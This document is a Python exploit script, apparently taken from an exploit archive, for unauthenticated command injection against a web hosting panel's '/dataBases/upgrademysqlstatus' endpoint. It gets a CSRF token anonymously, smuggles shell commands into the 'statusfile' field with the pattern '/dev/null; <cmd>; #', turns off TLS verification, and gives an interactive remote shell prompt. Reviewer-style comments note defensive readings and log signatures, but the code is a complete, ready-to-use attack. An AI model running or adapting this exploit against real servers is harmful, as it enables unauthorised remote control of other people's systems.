## https://sploitus.com/exploit?id=PACKETSTORM:182539
import httpx   
import sys   
  
def get_CSRF_token(client):
    """Return the ``csrftoken`` cookie set by the server on ``GET /``.

    ``client`` is the HTTP client built in the ``__main__`` block, which is
    created with only a base URL, so this request carries no credentials
    from this script.

    Raises ``KeyError`` if the response sets no ``csrftoken`` cookie.
    """
    # The token is handed to any visitor of the index page, so holding a
    # valid one says nothing about who the caller is: CSRF protection is
    # not an authentication control.
    return client.get("/").cookies['csrftoken']
  
def pwn(client, CSRF_token, cmd):
    """PUT a JSON body to ``/dataBases/upgrademysqlstatus`` and return its
    ``requestStatus`` field.

    ``CSRF_token`` is sent both as the ``X-CSRFToken`` header and inside the
    body; ``cmd`` is spliced into the ``statusfile`` field.

    Raises whatever ``.json()`` raises on a non-JSON reply, and ``KeyError``
    if the decoded reply has no ``requestStatus`` key.
    """
    request_headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        # Referer is set to the target's own base URL.
        # NOTE(review): presumably to satisfy a same-origin Referer check.
        "Referer": str(client.base_url),
    }

    # The `statusfile` value has the shape `/dev/null; <cmd>; #`: a path, a
    # `;` separator, the caller's text, then `#`.
    # NOTE(review): this only has an effect if the server places `statusfile`
    # into a shell command line without quoting or validation -- confirm
    # against the server-side handler.
    # Defensive reading: treat any request to this path whose `statusfile`
    # contains `;`, `#` or other shell metacharacters as hostile. The handler
    # should require an authenticated session, accept only an expected file
    # path, and read the file without going through a shell.
    body = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)

    response = client.put(
        "/dataBases/upgrademysqlstatus",
        headers=request_headers,
        data=body,
    )
    return response.json()["requestStatus"]
  
def exploit(client, cmd):
    """Fetch a fresh CSRF token, send ``cmd`` via ``pwn``, and print the reply.

    Returns ``None``; the only output is the printed ``requestStatus`` value.
    """
    # A new `GET /` precedes every PUT, so in access logs each command shows
    # up as a GET of the index page followed immediately by a PUT to
    # /dataBases/upgrademysqlstatus from the same client.
    print(pwn(client, get_CSRF_token(client), cmd))
  
if __name__ == "__main__":
    # The base URL comes from the first command-line argument; a missing
    # argument raises IndexError.
    target = sys.argv[1]

    # verify=False turns off TLS certificate verification, so the script
    # talks to hosts with self-signed or otherwise invalid certificates.
    # No credentials, cookies or auth headers are configured on the client.
    session = httpx.Client(base_url=target, verify=False)

    # Prompt loop with no exit condition of its own: it ends only when
    # input() or a request raises (EOF, interrupt, network or parsing error).
    while True:
        exploit(session, input("$> "))